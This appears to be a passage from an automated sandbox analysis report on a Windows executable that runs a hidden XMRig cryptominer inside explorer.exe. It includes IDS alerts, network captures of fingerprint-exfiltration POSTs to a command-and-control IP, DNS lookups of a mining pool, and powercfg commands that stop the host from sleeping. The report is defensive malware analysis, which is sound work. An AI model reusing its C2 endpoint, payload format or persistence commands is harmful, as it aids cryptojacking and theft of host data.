                                  msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
                                  KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-12-18T12:08:54.301927+01002826930ETPRO COINMINER XMR CoinMiner Usage2192.168.2.549704104.238.180.20710300TCP
                                  2024-12-18T12:09:05.489486+01002044697ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M31192.168.2.549705185.215.113.21780TCP
                                  2024-12-18T12:10:05.130208+01002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.2.549812185.215.113.21780TCP
                                  2024-12-18T12:11:04.386796+01002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.2.549944185.215.113.21780TCP
                                  2024-12-18T12:12:04.632406+01002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.2.549980185.215.113.21780TCP
                                  2024-12-18T12:13:06.004768+01002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.2.549981185.215.113.21780TCP
                                  TimestampSource PortDest PortSource IPDest IP
                                  Dec 18, 2024 12:08:59.429645061 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:08:59.557391882 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:08:59.560791969 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:08:59.560996056 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:08:59.683902025 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:09:00.363279104 CET4970580192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:09:00.484678030 CET8049705185.215.113.217192.168.2.5
                                  Dec 18, 2024 12:09:00.484817982 CET4970580192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:09:00.490528107 CET4970580192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:09:00.615361929 CET8049705185.215.113.217192.168.2.5
                                  Dec 18, 2024 12:09:00.615467072 CET4970580192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:09:00.735269070 CET8049705185.215.113.217192.168.2.5
                                  Dec 18, 2024 12:09:00.950131893 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:09:01.005024910 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:09:05.489485979 CET4970580192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:09:05.653310061 CET8049705185.215.113.217192.168.2.5
                                  Dec 18, 2024 12:09:06.296730995 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:09:06.345271111 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:09:16.317246914 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:09:16.411279917 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:09:22.384560108 CET8049705185.215.113.217192.168.2.5
                                  Dec 18, 2024 12:09:22.384634972 CET4970580192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:09:26.314610004 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:09:26.426923037 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:09:27.289422035 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:09:27.411292076 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:09:37.292550087 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:09:37.411459923 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:09:41.325644016 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:09:41.411488056 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:09:51.307074070 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:09:51.388904095 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:09:58.285026073 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:09:58.411295891 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:10:00.007333040 CET4981280192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:10:00.128437042 CET8049812185.215.113.217192.168.2.5
                                  Dec 18, 2024 12:10:00.128719091 CET4981280192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:10:00.130359888 CET4981280192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:10:00.252886057 CET8049812185.215.113.217192.168.2.5
                                  Dec 18, 2024 12:10:00.252966881 CET4981280192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:10:00.378232002 CET8049812185.215.113.217192.168.2.5
                                  Dec 18, 2024 12:10:05.130208015 CET4981280192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:10:05.293521881 CET8049812185.215.113.217192.168.2.5
                                  Dec 18, 2024 12:10:08.289685011 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:10:08.411334991 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:10:22.040715933 CET8049812185.215.113.217192.168.2.5
                                  Dec 18, 2024 12:10:22.040780067 CET4981280192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:10:24.292596102 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:10:24.411320925 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:10:34.303364038 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:10:34.520667076 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:10:48.305074930 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:10:48.411243916 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:10:58.331650972 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:10:58.520538092 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:10:59.260181904 CET4994480192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:10:59.383284092 CET8049944185.215.113.217192.168.2.5
                                  Dec 18, 2024 12:10:59.383364916 CET4994480192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:10:59.383613110 CET4994480192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:10:59.503101110 CET8049944185.215.113.217192.168.2.5
                                  Dec 18, 2024 12:10:59.504983902 CET4994480192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:10:59.629091978 CET8049944185.215.113.217192.168.2.5
                                  Dec 18, 2024 12:11:04.386795998 CET4994480192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:11:04.552449942 CET8049944185.215.113.217192.168.2.5
                                  Dec 18, 2024 12:11:08.306871891 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:11:08.383141041 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:11:21.291476965 CET8049944185.215.113.217192.168.2.5
                                  Dec 18, 2024 12:11:21.291693926 CET4994480192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:11:23.317254066 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:11:23.520466089 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:11:33.318216085 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:11:33.411063910 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:11:43.323024035 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:11:43.411107063 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:11:53.309883118 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:11:53.426740885 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:11:59.512717962 CET4998080192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:11:59.632313967 CET8049980185.215.113.217192.168.2.5
                                  Dec 18, 2024 12:11:59.632477045 CET4998080192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:11:59.632899046 CET4998080192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:11:59.752461910 CET8049980185.215.113.217192.168.2.5
                                  Dec 18, 2024 12:11:59.752612114 CET4998080192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:11:59.872262955 CET8049980185.215.113.217192.168.2.5
                                  Dec 18, 2024 12:12:03.339878082 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:12:03.426594019 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:12:04.632405996 CET4998080192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:12:04.793627024 CET8049980185.215.113.217192.168.2.5
                                  Dec 18, 2024 12:12:13.356781960 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:12:13.411024094 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:12:21.512351990 CET8049980185.215.113.217192.168.2.5
                                  Dec 18, 2024 12:12:21.512485981 CET4998080192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:12:23.358988047 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:12:23.426660061 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:12:31.266499996 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:12:31.365855932 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:12:41.292313099 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:12:41.379219055 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:12:51.304833889 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:12:51.410974026 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:13:00.678129911 CET4998180192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:13:00.990720987 CET8049981185.215.113.217192.168.2.5
                                  Dec 18, 2024 12:13:00.990828037 CET4998180192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:13:01.004863024 CET4998180192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:13:01.124505997 CET8049981185.215.113.217192.168.2.5
                                  Dec 18, 2024 12:13:01.124567986 CET4998180192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:13:01.245318890 CET8049981185.215.113.217192.168.2.5
                                  Dec 18, 2024 12:13:01.312767029 CET1030049704104.238.180.207192.168.2.5
                                  Dec 18, 2024 12:13:01.520314932 CET4970410300192.168.2.5104.238.180.207
                                  Dec 18, 2024 12:13:06.004767895 CET4998180192.168.2.5185.215.113.217
                                  Dec 18, 2024 12:13:06.165546894 CET8049981185.215.113.217192.168.2.5
                                  TimestampSource PortDest PortSource IPDest IP
                                  Dec 18, 2024 12:08:59.263171911 CET5267653192.168.2.51.1.1.1
                                  Dec 18, 2024 12:08:59.424395084 CET53526761.1.1.1192.168.2.5
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Dec 18, 2024 12:08:59.263171911 CET192.168.2.51.1.1.10x8332Standard query (0)xmr-us-west1.nanopool.orgA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Dec 18, 2024 12:08:59.424395084 CET1.1.1.1192.168.2.50x8332No error (0)xmr-us-west1.nanopool.org45.76.65.223A (IP address)IN (0x0001)false
                                  Dec 18, 2024 12:08:59.424395084 CET1.1.1.1192.168.2.50x8332No error (0)xmr-us-west1.nanopool.org66.42.105.146A (IP address)IN (0x0001)false
                                  Dec 18, 2024 12:08:59.424395084 CET1.1.1.1192.168.2.50x8332No error (0)xmr-us-west1.nanopool.org45.32.71.82A (IP address)IN (0x0001)false
                                  Dec 18, 2024 12:08:59.424395084 CET1.1.1.1192.168.2.50x8332No error (0)xmr-us-west1.nanopool.org207.246.100.198A (IP address)IN (0x0001)false
                                  Dec 18, 2024 12:08:59.424395084 CET1.1.1.1192.168.2.50x8332No error (0)xmr-us-west1.nanopool.org104.238.180.207A (IP address)IN (0x0001)false
                                  Dec 18, 2024 12:08:59.424395084 CET1.1.1.1192.168.2.50x8332No error (0)xmr-us-west1.nanopool.org149.28.212.250A (IP address)IN (0x0001)false
                                  • 185.215.113.217
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.549705185.215.113.21780572C:\Windows\explorer.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 18, 2024 12:09:00.490528107 CET186OUTPOST /Deliberate/api/endpoint.php HTTP/1.1
                                  Accept: */*
                                  Connection: close
                                  Content-Length: 306
                                  Content-Type: application/json
                                  Host: 185.215.113.217
                                  User-Agent: cpp-httplib/0.12.6
                                  Dec 18, 2024 12:09:00.615467072 CET306OUTData Raw: 7b 22 69 64 22 3a 22 76 64 78 6e 65 62 6f 61 66 77 65 76 75 66 65 76 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 38 37 38 34 31 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 6c 66 6f 6e 73 22 2c 22 67 70 75 22 3a 22 48 4d 55 45 57 35
                                  Data Ascii: {"id":"vdxneboafwevufev","computername":"878411","username":"user","gpu":"HMUEW5","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explore


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.549812185.215.113.21780572C:\Windows\explorer.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 18, 2024 12:10:00.130359888 CET186OUTPOST /Deliberate/api/endpoint.php HTTP/1.1
                                  Accept: */*
                                  Connection: close
                                  Content-Length: 531
                                  Content-Type: application/json
                                  Host: 185.215.113.217
                                  User-Agent: cpp-httplib/0.12.6
                                  Dec 18, 2024 12:10:00.252966881 CET531OUTData Raw: 7b 22 69 64 22 3a 22 76 64 78 6e 65 62 6f 61 66 77 65 76 75 66 65 76 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 38 37 38 34 31 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 6c 66 6f 6e 73 22 2c 22 67 70 75 22 3a 22 48 4d 55 45 57 35
                                  Data Ascii: {"id":"vdxneboafwevufev","computername":"878411","username":"user","gpu":"HMUEW5","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explore


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.549944185.215.113.21780572C:\Windows\explorer.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 18, 2024 12:10:59.383613110 CET186OUTPOST /Deliberate/api/endpoint.php HTTP/1.1
                                  Accept: */*
                                  Connection: close
                                  Content-Length: 532
                                  Content-Type: application/json
                                  Host: 185.215.113.217
                                  User-Agent: cpp-httplib/0.12.6
                                  Dec 18, 2024 12:10:59.504983902 CET532OUTData Raw: 7b 22 69 64 22 3a 22 76 64 78 6e 65 62 6f 61 66 77 65 76 75 66 65 76 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 38 37 38 34 31 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 6c 66 6f 6e 73 22 2c 22 67 70 75 22 3a 22 48 4d 55 45 57 35
                                  Data Ascii: {"id":"vdxneboafwevufev","computername":"878411","username":"user","gpu":"HMUEW5","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explore


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.549980185.215.113.21780572C:\Windows\explorer.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 18, 2024 12:11:59.632899046 CET186OUTPOST /Deliberate/api/endpoint.php HTTP/1.1
                                  Accept: */*
                                  Connection: close
                                  Content-Length: 532
                                  Content-Type: application/json
                                  Host: 185.215.113.217
                                  User-Agent: cpp-httplib/0.12.6
                                  Dec 18, 2024 12:11:59.752612114 CET532OUTData Raw: 7b 22 69 64 22 3a 22 76 64 78 6e 65 62 6f 61 66 77 65 76 75 66 65 76 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 38 37 38 34 31 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 6c 66 6f 6e 73 22 2c 22 67 70 75 22 3a 22 48 4d 55 45 57 35
                                  Data Ascii: {"id":"vdxneboafwevufev","computername":"878411","username":"user","gpu":"HMUEW5","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explore


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.549981185.215.113.21780572C:\Windows\explorer.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 18, 2024 12:13:01.004863024 CET186OUTPOST /Deliberate/api/endpoint.php HTTP/1.1
                                  Accept: */*
                                  Connection: close
                                  Content-Length: 532
                                  Content-Type: application/json
                                  Host: 185.215.113.217
                                  User-Agent: cpp-httplib/0.12.6
                                  Dec 18, 2024 12:13:01.124567986 CET532OUTData Raw: 7b 22 69 64 22 3a 22 76 64 78 6e 65 62 6f 61 66 77 65 76 75 66 65 76 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 38 37 38 34 31 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 6c 66 6f 6e 73 22 2c 22 67 70 75 22 3a 22 48 4d 55 45 57 35
                                  Data Ascii: {"id":"vdxneboafwevufev","computername":"878411","username":"user","gpu":"HMUEW5","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explore


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:0
                                  Start time:06:08:57
                                  Start date:18/12/2024
                                  Path:C:\Users\user\Desktop\88aext0k.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\Desktop\88aext0k.exe"
                                  Imagebase:0x7ff7f4560000
                                  File size:5'168'640 bytes
                                  MD5 hash:3D375D10B594F69C51B80948EC0E4C03
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Target ID:1
                                  Start time:06:08:57
                                  Start date:18/12/2024
                                  Path:C:\Windows\System32\powercfg.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                  Imagebase:0x7ff772280000
                                  File size:96'256 bytes
                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:2
                                  Start time:06:08:57
                                  Start date:18/12/2024
                                  Path:C:\Windows\System32\powercfg.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                  Imagebase:0x7ff772280000
                                  File size:96'256 bytes
                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:3
                                  Start time:06:08:57
                                  Start date:18/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6d64d0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:4
                                  Start time:06:08:57
                                  Start date:18/12/2024
                                  Path:C:\Windows\System32\powercfg.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                  Imagebase:0x7ff772280000
                                  File size:96'256 bytes
                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:5
                                  Start time:06:08:57
                                  Start date:18/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6d64d0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:6
                                  Start time:06:08:57
                                  Start date:18/12/2024
                                  Path:C:\Windows\System32\powercfg.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                  Imagebase:0x7ff772280000
                                  File size:96'256 bytes
                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:7
                                  Start time:06:08:57
                                  Start date:18/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6d64d0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:8
                                  Start time:06:08:57
                                  Start date:18/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6d64d0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:9
                                  Start time:06:08:57
                                  Start date:18/12/2024
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:explorer.exe
                                  Imagebase:0x7ff674740000
                                  File size:5'141'208 bytes
                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000002.4533205171.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:false

                                  Reset < >
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2063669592.00007FF7F4561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4560000, based on PE: true
                                    • Associated: 00000000.00000002.2063635634.00007FF7F4560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2063696578.00007FF7F4567000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2063724328.00007FF7F4569000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2063977403.00007FF7F47D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2064274075.00007FF7F4A4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2064298735.00007FF7F4A50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff7f4560000_88aext0k.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 49560e65e48278aab596af773b04324913dcc64b682aa865d004edf92cb73eb6
                                    • Instruction ID: a59f42762cbc4fa7c8c60d8ac2c49398c5a99183a7b7d77ba2a1e61d9018c617
                                    • Opcode Fuzzy Hash: 49560e65e48278aab596af773b04324913dcc64b682aa865d004edf92cb73eb6
                                    • Instruction Fuzzy Hash: 7DB09231918209D6E7003F42D89126862606B08740F800020C42C03392CA7D60804FB0